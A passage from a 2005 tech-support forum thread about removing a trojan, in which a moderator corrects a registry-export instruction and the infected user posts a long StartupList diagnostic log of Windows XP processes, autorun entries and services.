Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

help i have trojan horse collected.5.L [RESOLVED]

Started by duglartis , Jun 09 2005 03:25 AM

  • This topic is locked This topic is locked

#121
Metallica
Posted 07 August 2005 - 04:06 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
:tazz:

I'm an id10t. Sorry. ;)

Step 1 should have read:

Click Start > Run > copy&paste regedit /e c:\userinit.reg "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" > OK

Regards,
  • 0

Advertisements

#122
duglartis
Posted 08 August 2005 - 03:27 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello
have carried out instructions here is the start up log
StartupList report, 8/08/2005, 21:24:18
StartupList version: 1.52.2
Started from : C:\Documents and Settings\Dug And Tania\My Documents\hijack\HijackThis.EXE
Detected: Windows XP SP1 (WinNT 5.01.2600)
Detected: Internet Explorer v6.00 SP1 (6.00.2800.1106)
* Using default options
* Including empty and uninteresting sections
* Showing rarely important sections
==================================================

Running processes:

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\documents and settings\dug and tania\my documents\downloads\regprot.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\ProcessGuard\procguard.exe
C:\Documents and Settings\Dug And Tania\My Documents\hijack\HijackThis.exe

--------------------------------------------------

Listing of startup folders:

Shell folders Startup:
[C:\Documents and Settings\Dug And Tania\Start Menu\Programs\Startup]
*No files*

Shell folders AltStartup:
*Folder not found*

User shell folders Startup:
*Folder not found*

User shell folders AltStartup:
*Folder not found*

Shell folders Common Startup:
[C:\Documents and Settings\All Users\Start Menu\Programs\Startup]
Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE

Shell folders Common AltStartup:
*Folder not found*

User shell folders Common Startup:
*Folder not found*

User shell folders Alternate Common Startup:
*Folder not found*

--------------------------------------------------

Checking Windows NT UserInit:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
UserInit = userinit.exe,xpjava.exe

[HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
*Registry value not found*

[HKCU\Software\Microsoft\Windows\CurrentVersion\Winlogon]
*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

HPDJ Taskbar Utility = C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
AdaptecDirectCD = C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
NeroCheck = C:\WINDOWS\System32\\NeroCheck.exe
NvCplDaemon = RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
QuickTime Task = "C:\Program Files\QuickTime\qttask.exe" -atboottime
AVG7_CC = C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
AVG7_EMC = C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
RegProt = c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start
nwiz = nwiz.exe /install
!1_pgaccount = "C:\Program Files\ProcessGuard\pgaccount.exe"

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run

NVIEW = rundll32.exe nview.dll,nViewLoadHook
!1_ProcessGuard_Startup = "C:\Program Files\ProcessGuard\procguard.exe" -minimize

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices

*No values found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries from Registry:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run

*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

[OptionalComponents]
*No values found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
*No subkeys found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Run
*Registry key not found*

--------------------------------------------------

Autorun entries in Registry subkeys of:
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Run
*Registry key not found*

--------------------------------------------------

File association entry for .EXE:
HKEY_CLASSES_ROOT\exefile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .COM:
HKEY_CLASSES_ROOT\comfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .BAT:
HKEY_CLASSES_ROOT\batfile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .PIF:
HKEY_CLASSES_ROOT\piffile\shell\open\command

(Default) = "%1" %*

--------------------------------------------------

File association entry for .SCR:
HKEY_CLASSES_ROOT\scrfile\shell\open\command

(Default) = "%1" /S

--------------------------------------------------

File association entry for .HTA:
HKEY_CLASSES_ROOT\htafile\shell\open\command

(Default) = C:\WINDOWS\System32\mshta.exe "%1" %*

--------------------------------------------------

File association entry for .TXT:
HKEY_CLASSES_ROOT\txtfile\shell\open\command

(Default) = %SystemRoot%\system32\NOTEPAD.EXE %1

--------------------------------------------------

Enumerating Active Setup stub paths:
HKLM\Software\Microsoft\Active Setup\Installed Components
(* = disabled by HKCU twin)

[>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
StubPath = C:\WINDOWS\inf\unregmp2.exe /ShowWMP

[>{26923b43-4d38-484f-9b9e-de460746276c}] *
StubPath = %systemroot%\system32\shmgrate.exe OCInstallUserConfigIE

[>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS] *
StubPath = RunDLL32 IEDKCS32.DLL,BrandIE4 SIGNUP

[>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}] *
StubPath = %systemroot%\system32\shmgrate.exe OCInstallUserConfigOE

[{2C7339CF-2B09-4501-B3F3-F3508C9228ED}] *
StubPath = %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll

[{306D6C21-C1B6-4629-986C-E59E1875B8AF}] *
StubPath = "C:\WINDOWS\System32\rundll32.exe" "C:\Program Files\Messenger\msgsc.dll",HideIconsUser

[{44BBA840-CC51-11CF-AAFA-00AA00B6015C}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install

[{44BBA842-CC51-11CF-AAFA-00AA00B6015B}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT

[{5945c046-1e7d-11d1-bc44-00c04fd912be}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msmsgs.inf,BLC.QuietInstall.PerUser

[{6BF52A52-394A-11d3-B153-00C04F79FAA6}] *
StubPath = rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp10.inf,PerUserStub

[{7790769C-0471-11d2-AF11-00C04FA35D02}] *
StubPath = "%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install

[{89820200-ECBD-11cf-8B85-00AA005B4340}] *
StubPath = regsvr32.exe /s /n /i:U shell32.dll

[{89820200-ECBD-11cf-8B85-00AA005B4383}] *
StubPath = %SystemRoot%\system32\ie4uinit.exe

[{9EF0045A-CDD9-438e-95E6-02B9AFEC8E11}] *
StubPath = C:\WINDOWS\SYSTEM32\UPDCRL.EXE -e -u C:\WINDOWS\SYSTEM\verisignpub1.crl

[{CA0A4247-44BE-11d1-A005-00805F8ABE06}] *
StubPath = RunDLL setupx.dll,InstallHinfSection PowerCfg.user 0 powercfg.inf

--------------------------------------------------

Enumerating ICQ Agent Autostart apps:
HKCU\Software\Mirabilis\ICQ\Agent\Apps

*Registry key not found*

--------------------------------------------------

Load/Run keys from C:\WINDOWS\WIN.INI:

load=*INI section not found*
run=*INI section not found*

Load/Run keys from Registry:

HKLM\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKLM\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKLM\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: load=*Registry value not found*
HKCU\..\Windows NT\CurrentVersion\WinLogon: run=*Registry value not found*
HKCU\..\Windows\CurrentVersion\WinLogon: load=*Registry key not found*
HKCU\..\Windows\CurrentVersion\WinLogon: run=*Registry key not found*
HKCU\..\Windows NT\CurrentVersion\Windows: load=
HKCU\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: load=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: run=*Registry value not found*
HKLM\..\Windows NT\CurrentVersion\Windows: AppInit_DLLs=

--------------------------------------------------

Shell & screensaver key from C:\WINDOWS\SYSTEM.INI:

Shell=*INI section not found*
SCRNSAVE.EXE=*INI section not found*
drivers=*INI section not found*

Shell & screensaver key from Registry:

Shell=Explorer.exe
SCRNSAVE.EXE=*Registry value not found*
drivers=*Registry value not found*

Policies Shell key:

HKCU\..\Policies: Shell=*Registry value not found*
HKLM\..\Policies: Shell=*Registry value not found*

--------------------------------------------------

Checking for EXPLORER.EXE instances:

C:\WINDOWS\Explorer.exe: PRESENT!

C:\Explorer.exe: not present
C:\WINDOWS\Explorer\Explorer.exe: not present
C:\WINDOWS\System\Explorer.exe: not present
C:\WINDOWS\System32\Explorer.exe: not present
C:\WINDOWS\Command\Explorer.exe: not present
C:\WINDOWS\Fonts\Explorer.exe: not present

--------------------------------------------------

Checking for superhidden extensions:

.lnk: HIDDEN! (arrow overlay: yes)
.pif: HIDDEN! (arrow overlay: yes)
.exe: not hidden
.com: not hidden
.bat: not hidden
.hta: not hidden
.scr: not hidden
.shs: HIDDEN!
.shb: HIDDEN!
.vbs: not hidden
.vbe: not hidden
.wsh: not hidden
.scf: HIDDEN! (arrow overlay: NO!)
.url: HIDDEN! (arrow overlay: yes)
.js: not hidden
.jse: not hidden

--------------------------------------------------

Verifying REGEDIT.EXE integrity:

- Regedit.exe found in C:\WINDOWS
- .reg open command is normal (regedit.exe %1)
- Company name OK: 'Microsoft Corporation'
- Original filename OK: 'REGEDIT.EXE'
- File description: 'Registry Editor'

Registry check passed

--------------------------------------------------

Enumerating Browser Helper Objects:

(no name) - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}
(no name) - C:\PROGRA~1\SPYBOT~1\SDHelper.dll - {53707962-6F74-2D53-2644-206D7942484F}

--------------------------------------------------

Enumerating Task Scheduler jobs:

Tune-up Application Start.job
XoftSpy.job

--------------------------------------------------

Enumerating Download Program Files:

[DirectAnimation Java Classes]
CODEBASE = file://C:\WINDOWS\SYSTEM\dajava.cab
OSD = C:\WINDOWS\Downloaded Program Files\DirectAnimation Java Classes.osd

[Internet Explorer Classes for Java]
CODEBASE = file://C:\WINDOWS\SYSTEM\iejava.cab
OSD = C:\WINDOWS\Downloaded Program Files\Internet Explorer Classes for Java.osd

[Microsoft XML Parser for Java]
CODEBASE = file://C:\WINDOWS\Java\classes\xmldso4.cab
OSD = C:\WINDOWS\Downloaded Program Files\Microsoft XML Parser for Java.osd

[iPIX ActiveX Control]
InProcServer32 = C:\WINDOWS\DOWNLO~1\ipixx.ocx
CODEBASE = http://www.ipix.com/download/ipixx.cab

[MSSecurityAdvisor Class]
InProcServer32 = C:\WINDOWS\System32\mssecadv.dll
CODEBASE = http://protect.micro...b?1104699695015

[{33363249-0000-0010-8000-00AA00389B71}]
CODEBASE = http://codecs.micros...386/i263_32.cab

[WUWebControl Class]
InProcServer32 = C:\WINDOWS\System32\wuweb.dll
CODEBASE = http://v5.windowsupd...b?1098860877234

[Java Plug-in 1.4.2_06]
InProcServer32 = C:\Program Files\Java\j2re1.4.2_06\bin\npjpi142_06.dll
CODEBASE = http://java.sun.com/...indows-i586.cab

[ActiveScan Installer Class]
InProcServer32 = C:\WINDOWS\Downloaded Program Files\asinst.dll
CODEBASE = http://www.pandasoft.../as5/asinst.cab

[{9F1C11AA-197B-4942-BA54-47A8489BB47F}]
CODEBASE = http://v4.windowsupd...8297.9412152778

[Java Plug-in 1.3.1_04]
InProcServer32 = C:\Program Files\JavaSoft\JRE\1.3.1_04\bin\npjava131_04.dll
CODEBASE = http://java.sun.com/...-131_04-win.cab

[Java Plug-in 1.4.2_06]
InProcServer32 = C:\Program Files\Java\j2re1.4.2_06\bin\npjpi142_06.dll
CODEBASE = http://java.sun.com/...indows-i586.cab

[Shockwave Flash Object]
InProcServer32 = C:\WINDOWS\System32\macromed\flash\swflash.ocx
CODEBASE = http://download.macr...ash/swflash.cab

--------------------------------------------------

Enumerating Winsock LSP files:

NameSpace #1: C:\WINDOWS\System32\mswsock.dll
NameSpace #2: C:\WINDOWS\System32\winrnr.dll
NameSpace #3: C:\WINDOWS\System32\mswsock.dll
Protocol #1: C:\WINDOWS\system32\mswsock.dll
Protocol #2: C:\WINDOWS\system32\mswsock.dll
Protocol #3: C:\WINDOWS\system32\mswsock.dll
Protocol #4: C:\WINDOWS\system32\rsvpsp.dll
Protocol #5: C:\WINDOWS\system32\rsvpsp.dll
Protocol #6: C:\WINDOWS\system32\mswsock.dll
Protocol #7: C:\WINDOWS\system32\mswsock.dll
Protocol #8: C:\WINDOWS\system32\mswsock.dll
Protocol #9: C:\WINDOWS\system32\mswsock.dll
Protocol #10: C:\WINDOWS\system32\mswsock.dll
Protocol #11: C:\WINDOWS\system32\mswsock.dll
Protocol #12: C:\WINDOWS\system32\mswsock.dll
Protocol #13: C:\WINDOWS\system32\mswsock.dll
Protocol #14: C:\WINDOWS\system32\mswsock.dll
Protocol #15: C:\WINDOWS\system32\mswsock.dll
Protocol #16: C:\WINDOWS\system32\mswsock.dll
Protocol #17: C:\WINDOWS\system32\mswsock.dll
Protocol #18: C:\WINDOWS\system32\mswsock.dll
Protocol #19: C:\WINDOWS\system32\mswsock.dll

--------------------------------------------------

Enumerating Windows NT/2000/XP services

61883 Unit Device: System32\DRIVERS\61883.sys (manual start)
Microsoft ACPI Driver: System32\DRIVERS\ACPI.sys (system)
Microsoft Kernel Acoustic Echo Canceller: system32\drivers\aec.sys (manual start)
AFD Networking Support Environment: \SystemRoot\System32\drivers\afd.sys (autostart)
Service for Avance AC97 Audio (WDM): system32\drivers\ALCXWDM.SYS (manual start)
Alerter: %SystemRoot%\System32\svchost.exe -k LocalService (manual start)
Application Layer Gateway Service: %SystemRoot%\System32\alg.exe (manual start)
AMD K7 Processor Driver: System32\DRIVERS\amdk7.sys (system)
Application Management: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
1394 ARP Client Protocol: System32\DRIVERS\arp1394.sys (manual start)
RAS Asynchronous Media Driver: System32\DRIVERS\asyncmac.sys (manual start)
Standard IDE/ESDI Hard Disk Controller: System32\DRIVERS\atapi.sys (system)
ATM ARP Client Protocol: System32\DRIVERS\atmarpc.sys (manual start)
Windows Audio: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Audio Stub Driver: System32\DRIVERS\audstub.sys (manual start)
AVC Device: System32\DRIVERS\avc.sys (manual start)
AVG7 Alert Manager Server: C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe (autostart)
AVG7 Kernel: \SystemRoot\System32\Drivers\avg7core.sys (system)
AVG7 Wrap Driver: \SystemRoot\System32\Drivers\avg7rsw.sys (system)
AVG7 Rezident Driver: \SystemRoot\System32\Drivers\avg7rsxp.sys (system)
AVG7 Update Service: C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe (autostart)
AVG Network Redirector: \??\C:\WINDOWS\System32\Drivers\avgtdi.sys (autostart)
Background Intelligent Transfer Service: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Computer Browser: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Closed Caption Decoder: System32\DRIVERS\CCDECODE.sys (manual start)
CD-ROM Driver: System32\DRIVERS\cdrom.sys (system)
Indexing Service: %SystemRoot%\system32\cisvc.exe (manual start)
ClipBook: %SystemRoot%\system32\clipsrv.exe (manual start)
COM+ System Application: C:\WINDOWS\System32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} (manual start)
Cryptographic Services: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
DiamondCS Process Guard Service v3.000: "C:\Program Files\ProcessGuard\dcsuserprot.exe" (autostart)
DHCP Client: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Disk Driver: System32\DRIVERS\disk.sys (system)
Logical Disk Manager Administrative Service: %SystemRoot%\System32\dmadmin.exe /com (manual start)
dmboot: System32\drivers\dmboot.sys (disabled)
Logical Disk Manager Driver: System32\DRIVERS\dmio.sys (system)
Logical Disk Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Microsoft Kernel DLS Syntheiszer: system32\drivers\DMusic.sys (manual start)
DNS Client: %SystemRoot%\System32\svchost.exe -k NetworkService (autostart)
Microsoft Kernel DRM Audio Descrambler: system32\drivers\drmkaud.sys (manual start)
Error Reporting Service: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Event Log: %SystemRoot%\system32\services.exe (autostart)
COM+ Event System: C:\WINDOWS\System32\svchost.exe -k netsvcs (manual start)
Fast User Switching Compatibility: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Floppy Disk Controller Driver: System32\DRIVERS\fdc.sys (manual start)
Floppy Disk Driver: System32\DRIVERS\flpydisk.sys (manual start)
Volume Manager Driver: System32\DRIVERS\ftdisk.sys (system)
Game Port Enumerator: System32\DRIVERS\gameenum.sys (manual start)
Generic Packet Classifier: System32\DRIVERS\msgpc.sys (manual start)
HCF_MSFT: System32\DRIVERS\HCF_MSFT.sys (manual start)
Help and Support: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Human Interface Device Access: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
Microsoft HID Class Driver: System32\DRIVERS\hidusb.sys (manual start)
i8042 Keyboard and PS/2 Mouse Port Driver: System32\DRIVERS\i8042prt.sys (system)
CD-Burning Filter Driver: system32\drivers\Imapi.sys (system)
IMAPI CD-Burning COM Service: C:\WINDOWS\System32\imapi.exe (manual start)
IP Traffic Filter Driver: System32\DRIVERS\ipfltdrv.sys (manual start)
IP in IP Tunnel Driver: System32\DRIVERS\ipinip.sys (manual start)
IP Network Address Translator: System32\DRIVERS\ipnat.sys (manual start)
RIP Listener: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
IPSEC driver: System32\DRIVERS\ipsec.sys (system)
IR Enumerator Service: System32\DRIVERS\irenum.sys (manual start)
PnP ISA/EISA Bus Driver: System32\DRIVERS\isapnp.sys (system)
Keyboard Class Driver: System32\DRIVERS\kbdclass.sys (system)
Keyboard HID Driver: System32\DRIVERS\kbdhid.sys (system)
Microsoft Kernel Wave Audio Mixer: system32\drivers\kmixer.sys (manual start)
Server: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Workstation: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
TCP/IP NetBIOS Helper: %SystemRoot%\System32\svchost.exe -k LocalService (autostart)
Messenger: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
NetMeeting Remote Desktop Sharing: C:\WINDOWS\System32\mnmsrvc.exe (manual start)
Mouse Class Driver: System32\DRIVERS\mouclass.sys (system)
Mouse HID Driver: System32\DRIVERS\mouhid.sys (manual start)
WebDav Client Redirector: System32\DRIVERS\mrxdav.sys (manual start)
MRXSMB: System32\DRIVERS\mrxsmb.sys (system)
Distributed Transaction Coordinator: C:\WINDOWS\System32\msdtc.exe (manual start)
Microsoft DV Camera and VCR: System32\DRIVERS\msdv.sys (manual start)
Windows Installer: C:\WINDOWS\System32\msiexec.exe /V (manual start)
Microsoft Streaming Service Proxy: system32\drivers\MSKSSRV.sys (manual start)
Microsoft Streaming Clock Proxy: system32\drivers\MSPCLOCK.sys (manual start)
Microsoft Streaming Quality Manager Proxy: system32\drivers\MSPQM.sys (manual start)
Microsoft Streaming Tee/Sink-to-Sink Converter: system32\drivers\MSTEE.sys (manual start)
Microsoft MPU-401 MIDI UART Driver: system32\drivers\msmpu401.sys (manual start)
NABTS/FEC VBI Codec: System32\DRIVERS\NABTSFEC.sys (manual start)
Microsoft TV/Video Connection: System32\DRIVERS\NdisIP.sys (manual start)
Remote Access NDIS TAPI Driver: System32\DRIVERS\ndistapi.sys (manual start)
NDIS Usermode I/O Protocol: System32\DRIVERS\ndisuio.sys (manual start)
Remote Access NDIS WAN Driver: System32\DRIVERS\ndiswan.sys (manual start)
NetBIOS Interface: System32\DRIVERS\netbios.sys (system)
NetBios over Tcpip: System32\DRIVERS\netbt.sys (system)
Network DDE: %SystemRoot%\system32\netdde.exe (manual start)
Network DDE DSDM: %SystemRoot%\system32\netdde.exe (manual start)
Net Logon: %SystemRoot%\System32\lsass.exe (manual start)
Network Connections: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
1394 Net Driver: System32\DRIVERS\nic1394.sys (manual start)
Network Location Awareness (NLA): %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
NT LM Security Support Provider: %SystemRoot%\System32\lsass.exe (manual start)
Removable Storage: %SystemRoot%\system32\svchost.exe -k netsvcs (manual start)
nv: System32\DRIVERS\nv4_mini.sys (manual start)
NVIDIA Driver Helper Service: %SystemRoot%\System32\nvsvc32.exe (autostart)
IPX Traffic Filter Driver: System32\DRIVERS\nwlnkflt.sys (manual start)
IPX Traffic Forwarder Driver: System32\DRIVERS\nwlnkfwd.sys (manual start)
VIA OHCI Compliant IEEE 1394 Host Controller: System32\DRIVERS\ohci1394.sys (system)
Parallel port driver: System32\DRIVERS\parport.sys (manual start)
PCI Bus Driver: System32\DRIVERS\pci.sys (system)
Padus ASPI Shell: system32\drivers\pfc.sys (manual start)
Plug and Play: %SystemRoot%\system32\services.exe (autostart)
IPSEC Services: %SystemRoot%\System32\lsass.exe (autostart)
WAN Miniport (PPTP): System32\DRIVERS\raspptp.sys (manual start)
Prime95 Service: C:\Program Files\Prime95\prime95.exe (disabled)
procguard: \??\C:\WINDOWS\System32\drivers\procguard.sys (autostart)
StarForce Protection Environment Driver v6: \SystemRoot\System32\drivers\prodrv06.sys (system)
StarForce Protection Helper Driver v2: System32\drivers\prohlp02.sys (system)
StarForce Protection Synchronization Driver v1: System32\drivers\prosync1.sys (system)
Protected Storage: %SystemRoot%\system32\lsass.exe (autostart)
Direct Parallel Link Driver: System32\DRIVERS\ptilink.sys (manual start)
Remote Access Auto Connection Driver: System32\DRIVERS\rasacd.sys (system)
Remote Access Auto Connection Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
WAN Miniport (L2TP): System32\DRIVERS\rasl2tp.sys (manual start)
Remote Access Connection Manager: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Remote Access PPPOE Driver: System32\DRIVERS\raspppoe.sys (manual start)
Direct Parallel: System32\DRIVERS\raspti.sys (manual start)
Rdbss: System32\DRIVERS\rdbss.sys (system)
RDPCDD: System32\DRIVERS\RDPCDD.sys (system)
Terminal Server Device Redirector Driver: System32\DRIVERS\rdpdr.sys (manual start)
Remote Desktop Help Session Manager: C:\WINDOWS\system32\sessmgr.exe (manual start)
Digital CD Audio Playback Filter Driver: System32\DRIVERS\redbook.sys (system)
Routing and Remote Access: %SystemRoot%\System32\svchost.exe -k netsvcs (disabled)
Remote Registry: %SystemRoot%\system32\svchost.exe -k LocalService (autostart)
Microsoft Legacy Modem Driver: System32\Drivers\RootMdm.sys (manual start)
Remote Procedure Call (RPC) Locator: %SystemRoot%\System32\locator.exe (manual start)
Remote Procedure Call (RPC): %SystemRoot%\system32\svchost -k rpcss (autostart)
QoS RSVP: %SystemRoot%\System32\rsvp.exe (manual start)
Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver: System32\DRIVERS\RTL8139.SYS (manual start)
Security Accounts Manager: %SystemRoot%\system32\lsass.exe (autostart)
Smart Card Helper: %SystemRoot%\System32\SCardSvr.exe (manual start)
Smart Card: %SystemRoot%\System32\SCardSvr.exe (manual start)
Task Scheduler: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Secdrv: System32\DRIVERS\secdrv.sys (manual start)
Secondary Logon: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
System Event Notification: %SystemRoot%\system32\svchost.exe -k netsvcs (autostart)
Serenum Filter Driver: System32\DRIVERS\serenum.sys (manual start)
Serial port driver: System32\DRIVERS\serial.sys (system)
StarForce Protection Helper Driver: System32\drivers\sfhlp01.sys (system)
Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS): %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Shell Hardware Detection: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Simple TCP/IP Services: %SystemRoot%\System32\tcpsvcs.exe (autostart)
BDA Slip De-Framer: System32\DRIVERS\SLIP.sys (manual start)
Microsoft Kernel Audio Splitter: system32\drivers\splitter.sys (manual start)
Print Spooler: %SystemRoot%\system32\spoolsv.exe (autostart)
System Restore Filter Driver: System32\DRIVERS\sr.sys (system)
System Restore Service: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
Srv: System32\DRIVERS\srv.sys (manual start)
SSDP Discovery Service: %SystemRoot%\System32\svchost.exe -k LocalService (manual start)
Windows Image Acquisition (WIA): %SystemRoot%\System32\svchost.exe -k imgsvc (autostart)
BDA IPSink: System32\DRIVERS\StreamIP.sys (manual start)
Software Bus Driver: System32\DRIVERS\swenum.sys (manual start)
Microsoft Kernel GS Wavetable Synthesizer: system32\drivers\swmidi.sys (manual start)
MS Software Shadow Copy Provider: C:\WINDOWS\System32\dllhost.exe /Processid:{9E7A71B1-8156-4428-B261-633F815D8E09} (manual start)
Microsoft Kernel System Audio Device: system32\drivers\sysaudio.sys (manual start)
Performance Logs and Alerts: %SystemRoot%\system32\smlogsvc.exe (manual start)
Telephony: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
TCP/IP Protocol Driver: System32\DRIVERS\tcpip.sys (system)
Terminal Device Driver: System32\DRIVERS\termdd.sys (system)
Terminal Services: %SystemRoot%\System32\svchost.exe -k netsvcs (manual start)
Themes: %SystemRoot%\System32\svchost.exe -k netsvcs (autostart)
